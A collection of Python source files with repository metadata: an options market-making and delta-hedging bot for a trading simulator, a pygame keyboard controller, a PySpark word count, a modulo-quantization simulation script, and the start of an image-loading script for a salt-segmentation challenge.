volatility = 3.0)\n \n delta_position = option_delta * position\n \n total_delta_position += delta_position\n \n print(f'- The current delta position in the stock {stock_id} is {total_delta_position}.')\n stock_position = positions[stock_id]\n print(f'- The current position in the stock {stock_id} is {stock_position}.')\n\n # A4: Implement the delta hedge here, staying mindful of the overall position-limit of 100, also for the stocks.\n \n book = exchange.get_last_price_book(stock_id)\n if not book.bids or not book.asks:\n return\n else:\n best_bid = float(book.bids[0].price)\n best_ask = float(book.asks[0].price)\n \n \n \n volume = int(round(total_delta_position,0)) + stock_position\n \n delta_pos = float(total_delta_position)\n if volume >= 0:\n stock_position_after = stock_position - volume\n if stock_position_after < -100:\n position_exceeded = -100 - stock_position_after\n volume = volume - position_exceeded\n side = 'ask'\n hedge_price = best_bid\n elif volume < 0:\n volume = -volume\n stock_position_after = stock_position + volume\n if stock_position_after > 100:\n position_exceeded = stock_position_after - 100\n volume = volume - position_exceeded\n side = 'bid'\n hedge_price = best_ask\n \n print(\"delta_pos: \", delta_pos)\n print(\"stock_position: \", stock_position)\n print(\"net_delta: \", (delta_pos + stock_position))\n \n if delta_pos + stock_position > 15 or delta_pos + stock_position < -15 or force_delta_decrease or force_delta_increase:\n \n if not trade_would_breach_position_limit(stock_id, volume, side) and volume != 0:\n print(f'''Inserting IOC {side} for {stock_id}: {volume:.0f} lot(s) at price {hedge_price:.2f}.''')\n exchange.insert_order(\n instrument_id=stock_id,\n price=hedge_price,\n volume=volume,\n side=side,\n order_type='ioc')\n else:\n print(\"- Not hedging.\")\n \n else:\n print(f'- Not hedging.')\n return (delta_pos + stock_position)\n \n \ndef options_delta_calc(options_list):\n delta_sum = 0\n for option in options_list:\n time_to_expiry = calculate_current_time_to_date(option['expiry_date'])\n strike = option['strike']\n interest_rate = 0.0\n volatility = 3.0\n if option['callput'] == 'call':\n option_delta = call_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n elif option['callput'] == 'put':\n option_delta = put_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n option['delta'] = option_delta\n delta_sum += option_delta\n \n delta_sum = round(delta_sum,2) \n \n if delta_sum < 0:\n delta_sum += 0.8\n elif delta_sum > 0:\n delta_sum -= 0.8\n\n if delta_sum > 0:\n return 'positive', delta_sum\n elif delta_sum < 0:\n return 'negative', delta_sum\n\n\n# A2: Not all the options have been entered here yet, include all of them for an easy improvement\nbid_count = 0\n\nSTOCK_ID = 'BMW'\nOPTIONS = [\n {'id': 'BMW-2021_12_10-050C', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 50, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-050P', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 50, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-050C', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 50, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-050P', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 50, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-075C', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 75, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-075P', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 75, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-075C', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 75, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-075P', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 75, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-100C', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 100, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2021_12_10-100P', 'expiry_date': dt.datetime(2021, 12, 10, 12, 0, 0), 'strike': 100, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-100C', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 100, 'callput': 'call', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n {'id': 'BMW-2022_01_14-100P', 'expiry_date': dt.datetime(2022, 1, 14, 12, 0, 0), 'strike': 100, 'callput': 'put', 'last_ask': 0.0, 'last_bid': 0.0, 'delta': 0.0, 'position_limit': 100},\n]\n\n\nfor option in OPTIONS:\n book = exchange.get_last_price_book(option['id'])\n if not book.bids or not book.asks:\n continue\n else:\n best_bid = float(book.bids[0].price)\n best_ask = float(book.asks[0].price)\n \n option['last_ask'] = best_ask\n option['last_bid'] = best_bid\n \nwhile True:\n print(f'')\n print(f'-----------------------------------------------------------------')\n print(f'TRADE LOOP ITERATION ENTERED AT {str(dt.datetime.now()):18s} UTC.')\n print(f'-----------------------------------------------------------------')\n\n stock_value = get_midpoint_value(STOCK_ID)\n \n delta_sign, delta_sum = options_delta_calc(OPTIONS)\n \n if delta_sign == 'positive':\n delta_position_change = int(round(delta_sum/6,0)*100)\n for option in OPTIONS:\n if option['delta'] > 0:\n option['position_limit'] -= delta_position_change\n delta_sum -= delta_position_change\n elif delta_sign == 'negative':\n delta_position_change = int(round(delta_sum/6,0)*100)\n for option in OPTIONS:\n if option['delta'] < 0:\n option['position_limit'] += delta_position_change\n delta_sum -= delta_position_change\n \n if stock_value is None:\n print('Empty stock order book on bid or ask-side, or both, unable to update option prices.')\n time.sleep(4)\n continue\n \n book_BMW = exchange.get_last_price_book(STOCK_ID)\n best_ask_BMW = round(float(book_BMW.asks[0].price),1)\n best_bid_BMW = round(float(book_BMW.bid[0].price),1)\n \n max_delta = 0.0\n for option in OPTIONS:\n if option['delta'] < 0:\n if (-option['delta']) > max_delta:\n max_delta = -option['delta']\n else:\n if option['delta'] > max_delta:\n max_delta = option['delta']\n \n for option in OPTIONS:\n \n trades = exchange.poll_new_trades(option['id'])\n a_list = []\n for t in trades:\n print(f\"[TRADED {t.instrument_id}] price({t.price}), volume({t.volume}), side({t.side})\")\n a_list.append([t.instrument_id, t.price, t.volume, str(t.side)])\n \n print(a_list)\n for item in a_list:\n side = item[3]\n if side == 'bid':\n last_bid = item[1]\n option['last_bid'] = last_bid\n elif side == 'ask':\n last_ask = item[1]\n option['last_ask'] = last_ask\n \n print(f\"\\nUpdating instrument {option['id']}\")\n \n expiry_date = option['expiry_date']\n strike = option['strike']\n callput = option['callput']\n interest_rate = 0.0\n volatility = 3.0\n option_limit = option['position_limit']\n \n \n\n theoretical_value = calculate_theoretical_option_value(expiry_date=expiry_date,\n strike=strike,\n callput=callput,\n stock_value=stock_value,\n interest_rate=interest_rate,\n volatility=volatility)\n\n # A1: Here we ask a fixed credit of 15cts, regardless of what the market circumstances are or which option\n # we're quoting. That can be improved. Can you think of something better?\n time_to_expiry = calculate_current_time_to_date(expiry_date)\n if callput == 'call':\n option_delta = call_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n option_vega = call_vega(S=stock_value, K=strike, T=time_to_expiry, r = interest_rate, sigma = volatility)\n elif callput == 'put':\n option_delta = put_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n option_vega = put_vega(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n else:\n raise Exception(f\"\"\"Got unexpected value for callput argument, should be 'call' or 'put' but was {callput}.\"\"\")\n \n if theoretical_value > option['strike']:\n credit1 = theoretical_value - option['strike'] - 0.1\n elif theoretical_value < option['strike']:\n credit1 = option['strike'] - theoretical_value - 0.1\n else:\n credit1 = 0\n \n book = exchange.get_last_price_book(option['id'])\n if len(book.bids)<2 or len(book.asks)<2:\n credit2 = 0\n else:\n best_bid = float(book.bids[1].price)\n best_ask = float(book.asks[1].price)\n best_bid_vol = int(book.bids[1].volume)\n best_ask_vol = int(book.asks[1].volume)\n \n if theoretical_value > best_bid:\n diff_bid = theoretical_value - best_bid\n else:\n diff_bid = best_bid - theoretical_value\n \n if theoretical_value < best_ask:\n diff_ask = best_ask - theoretical_value\n else:\n diff_ask = theoretical_value - best_ask\n \n if diff_bid < diff_ask:\n credit2 = diff_bid\n else:\n credit2 = diff_ask\n \n positions = exchange.get_positions()\n position = positions[option['id']]\n \n \n \n if credit1 > credit2:\n credit = credit2\n elif credit1 < credit2:\n credit = credit1 \n \n \n delta_multiplier = option_delta/max_delta\n \n if delta_multiplier < 0:\n delta_multiplier = -delta_multiplier\n \n credit = credit*0.4 + 0.6*credit*delta_multiplier\n # A5: Here we are inserting a volume of 3, only taking into account the position limit of 100, are there better\n # choices?\n print(f\"{option['id']} limit is {option_limit}.\")\n update_quotes(callput=option['callput'],\n option_id=option['id'],\n theoretical_price=theoretical_value,\n credit=credit,\n volume=20,\n position_limit=option_limit,\n tick_size=0.10)\n\n # Wait 1/10th of a second to avoid breaching the exchange frequency limit\n time.sleep(0.10)\n \n\n print(f'\\nHedging delta position')\n \n net_delta = hedge_delta_position(STOCK_ID, OPTIONS, stock_value)\n stock_position = positions[STOCK_ID]\n print(stock_position)\n if stock_position >= 80:\n print(\"force_delta_increase = True\")\n force_delta_increase = True\n elif stock_position <= 80:\n print(\"force_delta_decrease = False confirmed.\")\n force_delta_decrease = False\n if stock_position <= -80:\n print(\"force_delta_decrease = True\")\n force_delta_decrease = True\n elif stock_position >= -80:\n print(\"force_delta_increase = False confirmed.\")\n force_delta_increase = False\n \n print(f'Sleeping for 2 seconds.')\n time.sleep(2)\n", "sub_path": "market_makingv0.0.1.py", "file_name": "market_makingv0.0.1.py", "file_ext": "py", "file_size_in_byte": 26093, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "optibook.synchronous_client.Exchange", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 46, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 53, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 83, "usage_type": "call"}, {"api_name": "black_scholes.call_value", "line_number": 86, "usage_type": "call"}, {"api_name": "black_scholes.put_value", "line_number": 88, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 106, "usage_type": "call"}, {"api_name": "black_scholes.call_delta", "line_number": 109, "usage_type": "call"}, {"api_name": "black_scholes.put_delta", "line_number": 111, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 364, "usage_type": "call"}, {"api_name": "black_scholes.call_delta", "line_number": 369, "usage_type": "call"}, {"api_name": "black_scholes.put_delta", "line_number": 371, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 393, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 394, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 395, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 396, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 397, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 398, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 400, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 401, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 402, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 403, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 404, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 422, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 422, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 444, "usage_type": "call"}, {"api_name": "libs.calculate_current_time_to_date", "line_number": 498, "usage_type": "call"}, {"api_name": "black_scholes.call_delta", "line_number": 500, "usage_type": "call"}, {"api_name": "black_scholes.call_vega", "line_number": 501, "usage_type": "call"}, {"api_name": "black_scholes.put_delta", "line_number": 503, "usage_type": "call"}, {"api_name": "black_scholes.put_vega", "line_number": 504, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 568, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 590, "usage_type": "call"}]} +{"seq_id": "79489850", "text": "import pygame\nimport sys\nfrom pygame.locals import *\nclass Controller ():\n \n def __init__(self):\n pygame.key.set_repeat(30, 50)\n self.bombkey_down = 0;\n def handle_keyboard_input(self, player):\n\n if player.state.alive is False: return\n\n self = self\n# @todo: Pruefen, ob diese Methode nicht besser zum Spiel passt !!!\n# speichert die gedrueckten Tasten im Dictionary ,\n# kann geholt werden mit actionkeys[pygame.K_LEFT], etc.\n# actionkeys = pygame.key.get_pressed()\n# print actionkeys\n\n for e in pygame.event.get():\n \n if e.type == QUIT:\n player.game.gameRunning = False\n # @todo: hier eine spiel beenden methode aufrufen\n pygame.quit()\n sys.exit()\n elif e.type == KEYDOWN:\n \n if e.key == K_ESCAPE:\n player.game.gameRunning = False\n pygame.quit()\n sys.exit()\n \n elif e.key == K_SPACE:\n# print player.game.debug\n if player.state.standing or player.state.is_at_ladder:\n \n if not player.state.jumping:\n player.movement[1] -= player.speed * 2.5\n player.state.change_to_jumping()\n# \n \n elif e.key == K_UP:\n if player.state.is_at_ladder:\n player.movement[1] = -player.speed\n player.face_up()\n else:\n if player.state.standing and not player.state.jumping and not player.state.falling:\n# if player.state.standing and not player.state.falling:\n player.movement[1] -= player.speed * 2.5\n player.state.change_to_jumping()\n \n elif e.key == K_DOWN:\n if player.state.is_at_ladder:\n player.movement[1] = player.speed\n player.face_down()\n player.state.change_to_climbing()\n elif player.state.standing and self.bombkey_down < pygame.time.get_ticks():\n player.placeTNT()\n self.bombkey_down = pygame.time.get_ticks() + 1500;\n \n elif e.key == K_LEFT:\n player.face_left()\n player.state.movement_key_pressed = True\n \n if player.state.falling and not player.state.jumping:\n player.movement[0] = -player.speed / 2\n else:\n player.movement[0] = -player.speed\n \n if not player.state.can_walk_left:\n# print \"cannot walk left\"\n player.movement[0] = 0\n \n \n \n elif e.key == K_RIGHT:\n player.face_right()\n player.state.movement_key_pressed = True\n \n if player.state.falling and not player.state.jumping:\n player.movement[0] = player.speed / 2\n else:\n player.movement[0] = player.speed\n \n if not player.state.can_walk_right:\n# print \"cannot walk right\"\n player.movement[0] = 0\n \n \n \n elif e.type == KEYUP:\n if e.key == K_UP or e.key == K_DOWN:\n player.movement[1] = 0\n \n elif e.key == K_LEFT or e.key == K_RIGHT:\n player.movement[0] = 0\n player.state.movement_key_pressed = False\n\n \n", "sub_path": "src/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 3970, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.key.set_repeat", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.time.get_ticks", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "161978271", "text": "from pyspark import SparkContext, SparkConf\n\nif __name__ == \"__main__\":\n # create SparkContext, which is imported from pyspark API\n # this context is the entry point to Spark Core\n # our Spark App is word count\n # will run Spark app on embedded Spark instance on our local box, which could use up to 3 cores of our CPU\n # sc.setLogLevel(\"ERROR\")\n # above not necessary if change Spark config files\n conf = SparkConf().setAppName(\"word count\").setMaster(\"local[3]\")\n sc = SparkContext(conf = conf)\n\n # load word count file as an RDD (resilient distrubted dataset)\n lines = sc.textFile(\"in/word_count.text\")\n\n #split article into words, whitespace as delimiter\n words = lines.flatMap(lambda line: line.split(\" \"))\n\n #calculate occurrence of each word\n wordCounts = words.countByValue()\n\n #print out the results\n for word, count in wordCounts.items():\n print(\"{} : {}\".format(word, count))\n", "sub_path": "rdd/WordCount.py", "file_name": "WordCount.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyspark.SparkConf", "line_number": 10, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "304128210", "text": "#!/usr/bin/python3\r\n'''\r\nthis script is:\r\n generating all combinations of A\r\n in loop:\r\n randomizing data det\r\n getting few samples from data\r\n for each A:\r\n deciding by tails of the samples if A is good\r\n deciding by A*cov*A if A is good\r\n checking errors\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\nimport itertools,random\r\nfrom optparse import OptionParser\r\n\r\nparser = OptionParser()\r\nparser.add_option(\"-n\",\"\", dest=\"samples\", type=\"int\", default=2,help='number of dots X2 because you have x and y. for example 1000. you better use 5')\r\nparser.add_option(\"-s\",\"\", dest=\"simulations\", type=\"int\", default=10,help='number of simulations, for example 50. you better use 400')\r\nparser.add_option(\"-b\",\"\", dest=\"bins\", type=\"int\", default=200,help='number of bins, for example 200')\r\nparser.add_option(\"-t\",\"\", dest=\"threshold\", type=\"float\", default=2.5,help='this threshold is for deciding if data is U or N, by checking if there are samples over the threshold. this defines the tail size. bigger number will result of more detecting output as N')\r\nparser.add_option(\"-m\",\"\", dest=\"A_max_num\", type=\"int\", default=2,help='A max number for example for 2 you can get [[-2,1],[2,0]]. for number 10, you will get 189,776 options at A. at 5 you will have 13608. . you better use 10')\r\nparser.add_option(\"-o\", dest=\"different_cov\", help=\"if set, using same cov matrix for all simulations\", default=False, action=\"store_true\")\r\n(u,args)=parser.parse_args()\r\n\r\nif 0:\r\n u.samples=10\r\n u.A_max_num=8\r\n u.threshold=1.3\r\n\r\ndef rand_cov():\r\n m=np.matrix(np.random.normal(0,1,[2,2]))\r\n m=m.T*m\r\n '''now changing the cov det to 1 but you can skip it'''\r\n # m=m/np.sqrt(np.linalg.det(m))\r\n m = m / np.random.uniform(3*np.sqrt(np.linalg.det(m)), np.sqrt(np.linalg.det(m)))\r\n return np.mat(m)\r\n\r\ndef rand_A(max_det):\r\n done=0\r\n while not done:\r\n A=np.random.randint(-10,10,[2,2])\r\n if np.abs(np.linalg.det(A))0.5:\r\n done=1\r\n return np.mat(A)\r\n\r\ndef hist_plot(df,title):\r\n sns.jointplot(data=df, x=\"X\", y=\"Y\",xlim=[-4.4,4.4],ylim=[-4.4,4.4])#,ax=axes.pop())#, kind=\"kde\"\r\n plt.subplots_adjust(top=0.9)\r\n plt.suptitle(title)\r\n\r\n\r\n\r\n\r\n\r\ndef random_data(cov,samples):\r\n xy=pd.DataFrame(np.random.multivariate_normal([0,0], cov, samples),columns=['X','Y'])\r\n return xy\r\ndef sign_mod(xy,modulo_size_edge_to_edge):\r\n xy=xy.copy()\r\n xy+=modulo_size_edge_to_edge/2.0\r\n xy=xy.mod(modulo_size_edge_to_edge)-modulo_size_edge_to_edge/2.0\r\n xy.columns=['X','Y']\r\n return xy\r\ndef quantize(xy,modulo_size_edge_to_edge,number_of_bins):\r\n hlf=modulo_size_edge_to_edge/2.0\r\n bins = np.linspace(-hlf, hlf, number_of_bins+1)\r\n center = (bins[:-1] + bins[1:]) / 2 # which is also (q[:-1]+(q[1]-q[0])/2)\r\n bins[0] = -float(\"inf\") # otherwise the values outside the bins will get NaN\r\n bins[-1] = float(\"inf\")\r\n df=pd.DataFrame()\r\n df['X'] = pd.cut(xy.X, bins, labels=center).astype(float)\r\n df['Y'] = pd.cut(xy.Y, bins, labels=center).astype(float)\r\n return df\r\n\r\n\r\n\r\nmodulo_size_edge_to_edge=8.8\r\nsamples=u.samples\r\nbins=u.bins\r\nthreshold=u.threshold\r\n\r\n# cases=\"----inputs cases----\\nA:\\n%s\\ncov:\\n%s\\nmodulo_size_edge_to_edge:\\n%s\\nsamples:\\n%s\"%(str(A),str(cov),str(modulo_size_edge_to_edge),str(samples))\r\n# print (cases)\r\n# print (\"inputs:\")\r\n# print (\"A:\\n\"+str(A))\r\n# print (\"cov:\\n\"+str(cov))\r\n# print (\"modulo_size_edge_to_edge:\\n\"+str(modulo_size_edge_to_edge))\r\n# print (\"samples:\\n\"+str(samples))\r\n\r\n\r\ndef run_all_A_on_cov(cov,all_A):\r\n misdetecting_N_as_U = 0\r\n misdetecting_U_as_N = 0\r\n good_A = 0\r\n good_N_detection = 0\r\n\r\n df_original = random_data(cov, u.samples)\r\n df_mod1=sign_mod(df_original,modulo_size_edge_to_edge)\r\n df_quant=quantize(df_mod1,modulo_size_edge_to_edge,bins)\r\n results=[]\r\n for A in all_A:\r\n df_A=df_quant.dot(A)\r\n df_A.columns=['X','Y']\r\n df_mod2=sign_mod(df_A,modulo_size_edge_to_edge)\r\n df_AI=df_mod2.dot(A.I)\r\n df_AI.columns=['X','Y']\r\n\r\n output_cov=A.T*cov*A\r\n # xy_mse=pd.DataFrame([(df_AI-df_original).X.var(),(df_AI-df_original).Y.var()],index=['X','Y'],columns=[bins]).T\r\n true_good_A=(output_cov[0,0]<1.1 and output_cov[1,1]<1.1)\r\n good_A_by_tail=sum(pd.cut(df_mod2.head(u.samples).stack().values, [-float(\"inf\"), -threshold, threshold, float(\"inf\")], labels=[2, 0, 1]))==0\r\n good_A+=true_good_A\r\n if true_good_A==good_A_by_tail and true_good_A:\r\n good_N_detection+=1\r\n if true_good_A!=good_A_by_tail:\r\n misdetecting_N_as_U+=true_good_A\r\n misdetecting_U_as_N+=good_A_by_tail\r\n if 0:\r\n print(output_cov.round(10))\r\n print(A.round(10))\r\n print(\"true_good_A:%s, good_A_by_tail:%s\"%(true_good_A,good_A_by_tail) )\r\n print(df_mod2.set_index('X'))\r\n df_mod2.set_index('X').plot(style='.')\r\n plt.show()\r\n print(\"*\"*30)\r\n # print({'misdetecting_as_U':\"%5d\"%misdetecting_as_U,'misdetecting_as_N':\"%5d\"%misdetecting_as_N,'good_A':\"%5d\"%good_A,'sqrt_cov_det':\"%3s\"%str(np.sqrt(np.linalg.det(cov)).round(2)),'prsn':\"%3s\"%str((cov[1,0]/np.sqrt(cov[0,0]*cov[1,1])).round(2)),'cov':str(cov.round(2))})\r\n return {'sqrt_cov_det':np.sqrt(np.linalg.det(cov)),'prsn':cov[1,0]/np.sqrt(cov[0,0]*cov[1,1]),'good_A':good_A,'good_N_detection':100.0*good_N_detection/good_A,'misdetecting_N_as_U':misdetecting_N_as_U,'misdetecting_U_as_N':misdetecting_U_as_N,'cov':cov.round(3)}\r\n\r\nn=u.A_max_num\r\na=range(-n,n+1)\r\na=[a,a,a,a]\r\nall_A=[np.mat(i).reshape(2,2) for i in list(itertools.product(*a))]\r\n# all_A=[i for i in all_A if round(np.linalg.det(i))==2 and list(i.A1).count(0)<2 and round(np.linalg.det(i))]\r\nall_A=[i for i in all_A if list(i.A1).count(0)<2 and round(np.linalg.det(i))]\r\n# random.shuffle(all_A)\r\nprint(\"we have %0d A\"%len(all_A))\r\n\r\n# all_A=[np.mat([[1,2],[-3,-4]]),np.mat([[1,2],[3,-2]])]\r\n\r\nall=[]\r\nfor i in range(u.simulations):\r\n cov = rand_cov()\r\n # cov = all_A[0].T.I * (all_A[0].I)\r\n outputs=run_all_A_on_cov(cov,all_A)\r\n print(outputs)\r\n all+=[outputs]\r\ndf=pd.DataFrame(all).round(2)\r\ndf=df.reindex_axis([i for i in df.columns if i!='cov']+['cov'],axis=1)\r\ndf.to_excel(\"all results_n_%d_t_%g_m_%d.xlsx\"%(u.samples,u.threshold,u.A_max_num))", "sub_path": "code/results/full system/3. tail error misdetection U N find A.py", "file_name": "3. tail error misdetection U N find A.py", "file_ext": "py", "file_size_in_byte": 6449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "optparse.OptionParser", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.mat", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.mat", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.mat", "line_number": 134, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "247019135", "text": "from PIL import Image\nimport numpy as np\nimport os\nimport pandas as pd\n\ndt_base=\"C:/01.work/01.python/998.data/778.TGS_Salt_Identification_Challenge\"\nos.chdir(dt_base)\n\nTRAIN_PATH = \"train\\\\\"\nOUTPUT_PATH = \"prediction\\\\\"\nOUTPUT_MASK_PATH = \"liuyf_submission.csv\"\nDEPTH_FILE = \"depths.csv\"\nTEST_PATH = \"test\\\\\"\nMAX_COUNT = 400\ndef loadFileData(dtPath ,MaxCount = 0):\n pwd = os.getcwd()\n os.chdir(os.path.dirname(dtPath))\n if MaxCount > 0 :\n dat = pd.read_csv(os.path.basename(dtPath), encoding=\"utf_8\", keep_default_na=False,MaxCount =50)\n else:\n dat = pd.read_csv(os.path.basename(dtPath), encoding=\"utf_8\",keep_default_na=False)\n os.chdir(pwd)\n return dat\n\ndef ImageToMatrix(filename):\n im = Image.open(filename)\n width, height = im.size\n im = im.convert(\"L\")\n data = im.getdata()\n data = np.matrix(data, dtype='float') / 255.0\n new_data = np.reshape(data, (width, height))\n return new_data\n\ndef MatrixToImage(data):\n data = data*255\n new_im = Image.fromarray(data.astype(np.uint8))\n return new_im\n\ndef getFilesByPath(path):\n fileList = []\n files = os.listdir(path)\n for f in files:\n if (os.path.isdir(path + '/' + f)):\n continue\n if (os.path.isfile(path + '/' + f)):\n fileList.append(f)\n if len(fileList) > MAX_COUNT:\n return fileList\n return fileList\ndef getListFileData(path,files):\n listData = []\n for file in files:\n date = ImageToMatrix(path+file)\n listData.append(date)\n return listData\n\ndef GetPathData(path,istrain = 1):\n files = getFilesByPath(path+\"images\\\\\")\n x_datas = getListFileData(path+\"images\\\\\",files)\n y_datas = []\n H_datas = []\n\n h_dt = loadFileData(TRAIN_PATH+DEPTH_FILE)\n if istrain == 1:\n # files = getFilesByPath(path+\"masks\\\\\")\n y_datas = getListFileData(path+\"masks\\\\\",files)\n for file in files:\n t_dt = h_dt[h_dt[\"id\"]==file.replace(\".png\",\"\")]\n t_dt = t_dt.reset_index()\n if t_dt.shape[0] == 0 :\n H_datas.append(0)\n else:\n H_datas.append(t_dt.ix[0,\"z\"])\n return x_datas,y_datas,H_datas,files\n\ndef OutPut_Images(images,files):\n for i in range(len(files)):\n image = images[i]\n b_image = MatrixToImage(image)\n b_image.save(OUTPUT_PATH+files[i])\n\ndef __writefile(str,file):\n f1 = open(file, 'a+')\n f1.write(str + '\\n')\n f1.close()\n\ndef run_rle(out_path,msk_fn):\n\n 